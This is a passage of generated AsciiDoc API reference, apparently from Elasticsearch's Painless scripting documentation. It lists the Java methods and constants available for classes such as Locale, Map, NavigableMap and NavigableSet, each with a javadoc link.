{java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] 
{java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ListIterator]] -==== ListIterator -* void {java11-javadoc}/java.base/java/util/ListIterator.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/Iterator.html#forEachRemaining(java.util.function.Consumer)[forEachRemaining](Consumer) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* boolean {java11-javadoc}/java.base/java/util/ListIterator.html#hasPrevious()[hasPrevious]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Iterator.html#next()[next]() -* int {java11-javadoc}/java.base/java/util/ListIterator.html#nextIndex()[nextIndex]() -* int {java11-javadoc}/java.base/java/util/ListIterator.html#previousIndex()[previousIndex]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* void {java11-javadoc}/java.base/java/util/ListIterator.html#set(java.lang.Object)[set](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale]] -==== Locale -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#CANADA[CANADA] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#CANADA_FRENCH[CANADA_FRENCH] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#CHINA[CHINA] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#CHINESE[CHINESE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#ENGLISH[ENGLISH] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#FRANCE[FRANCE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#FRENCH[FRENCH] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#GERMAN[GERMAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#GERMANY[GERMANY] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#ITALIAN[ITALIAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#ITALY[ITALY] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#JAPAN[JAPAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#JAPANESE[JAPANESE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#KOREA[KOREA] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#KOREAN[KOREAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#PRC[PRC] -* static char {java11-javadoc}/java.base/java/util/Locale.html#PRIVATE_USE_EXTENSION[PRIVATE_USE_EXTENSION] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#ROOT[ROOT] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#SIMPLIFIED_CHINESE[SIMPLIFIED_CHINESE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#TAIWAN[TAIWAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#TRADITIONAL_CHINESE[TRADITIONAL_CHINESE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#UK[UK] -* static char {java11-javadoc}/java.base/java/util/Locale.html#UNICODE_LOCALE_EXTENSION[UNICODE_LOCALE_EXTENSION] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#US[US] -* static List 
{java11-javadoc}/java.base/java/util/Locale.html#filter(java.util.List,java.util.Collection)[filter](List, Collection) -* static List {java11-javadoc}/java.base/java/util/Locale.html#filterTags(java.util.List,java.util.Collection)[filterTags](List, Collection) -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#forLanguageTag(java.lang.String)[forLanguageTag](null) -* static Locale[] {java11-javadoc}/java.base/java/util/Locale.html#getAvailableLocales()[getAvailableLocales]() -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#getDefault()[getDefault]() -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#getDefault(java.util.Locale$Category)[getDefault](Locale.Category) -* static null[] {java11-javadoc}/java.base/java/util/Locale.html#getISOCountries()[getISOCountries]() -* static null[] {java11-javadoc}/java.base/java/util/Locale.html#getISOLanguages()[getISOLanguages]() -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#lookup(java.util.List,java.util.Collection)[lookup](List, Collection) -* static null {java11-javadoc}/java.base/java/util/Locale.html#lookupTag(java.util.List,java.util.Collection)[lookupTag](List, Collection) -* {java11-javadoc}/java.base/java/util/Locale.html#(java.lang.String)[Locale](null) -* {java11-javadoc}/java.base/java/util/Locale.html#(java.lang.String,java.lang.String)[Locale](null, null) -* {java11-javadoc}/java.base/java/util/Locale.html#(java.lang.String,java.lang.String,java.lang.String)[Locale](null, null, null) -* def {java11-javadoc}/java.base/java/util/Locale.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/Locale.html#getCountry()[getCountry]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayCountry()[getDisplayCountry]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayCountry(java.util.Locale)[getDisplayCountry](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayLanguage()[getDisplayLanguage]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayLanguage(java.util.Locale)[getDisplayLanguage](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayName()[getDisplayName]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayScript()[getDisplayScript]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayScript(java.util.Locale)[getDisplayScript](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayVariant()[getDisplayVariant]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayVariant(java.util.Locale)[getDisplayVariant](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getExtension(char)[getExtension](char) -* Set {java11-javadoc}/java.base/java/util/Locale.html#getExtensionKeys()[getExtensionKeys]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getISO3Country()[getISO3Country]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getISO3Language()[getISO3Language]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getLanguage()[getLanguage]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getScript()[getScript]() -* Set {java11-javadoc}/java.base/java/util/Locale.html#getUnicodeLocaleAttributes()[getUnicodeLocaleAttributes]() -* Set 
{java11-javadoc}/java.base/java/util/Locale.html#getUnicodeLocaleKeys()[getUnicodeLocaleKeys]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getUnicodeLocaleType(java.lang.String)[getUnicodeLocaleType](null) -* null {java11-javadoc}/java.base/java/util/Locale.html#getVariant()[getVariant]() -* boolean {java11-javadoc}/java.base/java/util/Locale.html#hasExtensions()[hasExtensions]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Locale {java11-javadoc}/java.base/java/util/Locale.html#stripExtensions()[stripExtensions]() -* null {java11-javadoc}/java.base/java/util/Locale.html#toLanguageTag()[toLanguageTag]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale-Builder]] -==== Locale.Builder -* {java11-javadoc}/java.base/java/util/Locale$Builder.html#()[Locale.Builder]() -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#addUnicodeLocaleAttribute(java.lang.String)[addUnicodeLocaleAttribute](null) -* Locale {java11-javadoc}/java.base/java/util/Locale$Builder.html#build()[build]() -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#clear()[clear]() -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#clearExtensions()[clearExtensions]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#removeUnicodeLocaleAttribute(java.lang.String)[removeUnicodeLocaleAttribute](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setExtension(char,java.lang.String)[setExtension](char, null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setLanguage(java.lang.String)[setLanguage](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setLanguageTag(java.lang.String)[setLanguageTag](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setLocale(java.util.Locale)[setLocale](Locale) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setRegion(java.lang.String)[setRegion](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setScript(java.lang.String)[setScript](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setUnicodeLocaleKeyword(java.lang.String,java.lang.String)[setUnicodeLocaleKeyword](null, null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setVariant(java.lang.String)[setVariant](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale-Category]] -==== Locale.Category -* static Locale.Category {java11-javadoc}/java.base/java/util/Locale$Category.html#DISPLAY[DISPLAY] -* static Locale.Category {java11-javadoc}/java.base/java/util/Locale$Category.html#FORMAT[FORMAT] -* static Locale.Category {java11-javadoc}/java.base/java/util/Locale$Category.html#valueOf(java.lang.String)[valueOf](null) -* static Locale.Category[] {java11-javadoc}/java.base/java/util/Locale$Category.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 
{java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale-FilteringMode]] -==== Locale.FilteringMode -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#AUTOSELECT_FILTERING[AUTOSELECT_FILTERING] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#EXTENDED_FILTERING[EXTENDED_FILTERING] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#IGNORE_EXTENDED_RANGES[IGNORE_EXTENDED_RANGES] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#MAP_EXTENDED_RANGES[MAP_EXTENDED_RANGES] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#REJECT_EXTENDED_RANGES[REJECT_EXTENDED_RANGES] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#valueOf(java.lang.String)[valueOf](null) -* static Locale.FilteringMode[] {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale-LanguageRange]] -==== Locale.LanguageRange -* static double {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#MAX_WEIGHT[MAX_WEIGHT] -* static double {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#MIN_WEIGHT[MIN_WEIGHT] -* static List {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#mapEquivalents(java.util.List,java.util.Map)[mapEquivalents](List, Map) -* static List {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#parse(java.lang.String)[parse](null) -* static List {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#parse(java.lang.String,java.util.Map)[parse](null, Map) -* {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#(java.lang.String)[Locale.LanguageRange](null) -* {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#(java.lang.String,double)[Locale.LanguageRange](null, double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#getRange()[getRange]() -* double {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#getWeight()[getWeight]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongSummaryStatistics]] -==== LongSummaryStatistics -* {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#()[LongSummaryStatistics]() -* void {java11-javadoc}/java.base/java/util/function/LongConsumer.html#accept(long)[accept](long) -* LongConsumer 
{java11-javadoc}/java.base/java/util/function/LongConsumer.html#andThen(java.util.function.LongConsumer)[andThen](LongConsumer) -* void {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#combine(java.util.LongSummaryStatistics)[combine](LongSummaryStatistics) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getAverage()[getAverage]() -* long {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getCount()[getCount]() -* long {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getMax()[getMax]() -* long {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getMin()[getMin]() -* long {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getSum()[getSum]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Map]] -==== Map -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean 
{java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-Map-Entry]] -==== Map.Entry -* static Comparator {java11-javadoc}/java.base/java/util/Map$Entry.html#comparingByKey()[comparingByKey]() -* static Comparator {java11-javadoc}/java.base/java/util/Map$Entry.html#comparingByKey(java.util.Comparator)[comparingByKey](Comparator) -* static Comparator {java11-javadoc}/java.base/java/util/Map$Entry.html#comparingByValue()[comparingByValue]() -* static Comparator {java11-javadoc}/java.base/java/util/Map$Entry.html#comparingByValue(java.util.Comparator)[comparingByValue](Comparator) -* boolean {java11-javadoc}/java.base/java/util/Map$Entry.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getKey()[getKey]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/util/Map$Entry.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#setValue(java.lang.Object)[setValue](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MissingFormatArgumentException]] -==== MissingFormatArgumentException -* {java11-javadoc}/java.base/java/util/MissingFormatArgumentException.html#(java.lang.String)[MissingFormatArgumentException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/MissingFormatArgumentException.html#getFormatSpecifier()[getFormatSpecifier]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MissingFormatWidthException]] -==== MissingFormatWidthException -* {java11-javadoc}/java.base/java/util/MissingFormatWidthException.html#(java.lang.String)[MissingFormatWidthException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/MissingFormatWidthException.html#getFormatSpecifier()[getFormatSpecifier]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() 
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MissingResourceException]] -==== MissingResourceException -* {java11-javadoc}/java.base/java/util/MissingResourceException.html#(java.lang.String,java.lang.String,java.lang.String)[MissingResourceException](null, null, null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/MissingResourceException.html#getClassName()[getClassName]() -* null {java11-javadoc}/java.base/java/util/MissingResourceException.html#getKey()[getKey]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NavigableMap]] -==== NavigableMap -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#ceilingEntry(java.lang.Object)[ceilingEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#ceilingKey(java.lang.Object)[ceilingKey](def) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* Comparator {java11-javadoc}/java.base/java/util/SortedMap.html#comparator()[comparator]() -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableMap.html#descendingKeySet()[descendingKeySet]() -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#descendingMap()[descendingMap]() -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#firstEntry()[firstEntry]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#firstKey()[firstKey]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#floorEntry(java.lang.Object)[floorEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#floorKey(java.lang.Object)[floorKey](def) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, 
Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#headMap(java.lang.Object)[headMap](def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#headMap(java.lang.Object,boolean)[headMap](def, boolean) -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#higherEntry(java.lang.Object)[higherEntry](def) -* def {java11-javadoc}/java.base/java/util/NavigableMap.html#higherKey(java.lang.Object)[higherKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#lastEntry()[lastEntry]() -* def {java11-javadoc}/java.base/java/util/SortedMap.html#lastKey()[lastKey]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#lowerEntry(java.lang.Object)[lowerEntry](def) -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableMap.html#navigableKeySet()[navigableKeySet]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#pollFirstEntry()[pollFirstEntry]() -* Map.Entry {java11-javadoc}/java.base/java/util/NavigableMap.html#pollLastEntry()[pollLastEntry]() -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#subMap(java.lang.Object,java.lang.Object)[subMap](def, def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#subMap(java.lang.Object,boolean,java.lang.Object,boolean)[subMap](def, boolean, def, boolean) -* SortedMap {java11-javadoc}/java.base/java/util/SortedMap.html#tailMap(java.lang.Object)[tailMap](def) -* NavigableMap {java11-javadoc}/java.base/java/util/NavigableMap.html#tailMap(java.lang.Object,boolean)[tailMap](def, boolean) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-NavigableSet]] -==== NavigableSet -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) 
-* Collection asCollection() -* List asList() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#ceiling(java.lang.Object)[ceiling](def) -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* Comparator {java11-javadoc}/java.base/java/util/SortedSet.html#comparator()[comparator]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/NavigableSet.html#descendingIterator()[descendingIterator]() -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#descendingSet()[descendingSet]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#first()[first]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#floor(java.lang.Object)[floor](def) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* SortedSet {java11-javadoc}/java.base/java/util/SortedSet.html#headSet(java.lang.Object)[headSet](def) -* NavigableSet {java11-javadoc}/java.base/java/util/NavigableSet.html#headSet(java.lang.Object,boolean)[headSet](def, boolean) -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#higher(java.lang.Object)[higher](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* def {java11-javadoc}/java.base/java/util/SortedSet.html#last()[last]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#lower(java.lang.Object)[lower](def) -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/NavigableSet.html#pollLast()[pollLast]() -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* SortedSet 